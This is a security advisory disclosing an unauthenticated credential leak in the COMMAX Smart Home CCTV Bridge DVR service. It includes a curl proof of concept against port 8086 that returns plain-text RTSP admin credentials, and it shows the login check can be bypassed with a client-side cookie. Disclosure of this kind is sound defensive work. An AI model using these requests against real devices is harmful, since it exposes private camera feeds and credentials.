COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure Vendor: COMMAX Co., Ltd. Prodcut web page: https://www.commax.com Affected version: n/a Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment complex that provides advanced life values and safety. Desc: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose RTSP credentials in plain-text. Tested on: GoAhead-Webs Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5665 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php 02.08.2021 -- $ curl http://TARGET:8086/overview.asp <HTML> <HEAD> <TITLE> Infomation</TITLE> <script src="./jquery.min.js"></script> <script src="./jquery.cookie.js"></script> <script src="./login_check.js"></script> </HEAD> <BODY> <br><br> <center> <table> <tr><td> <li> [2021/08/15 09:56:46] Started <BR> <li> MAX USER : 32 <BR> <li> DVR Lists <BR>[1] rtsp://admin:s3cr3tP@$$w0rd@10.0.0.17:554/Streaming/Channels/2:554 <BR> </td></tr> </table> </center> </BODY> </HTML> $ curl http://TARGET:8086/login_check.js: var server_ip = $(location).attr('host'); var server_domain = server_ip.replace(":8086", ""); document.domain = server_domain; var cookiesAuth = $.cookie("cookiesAuth"); if (cookiesAuth != "authok") { parent.document.location.href = "http://" + server_domain + ":8086/home.asp"; }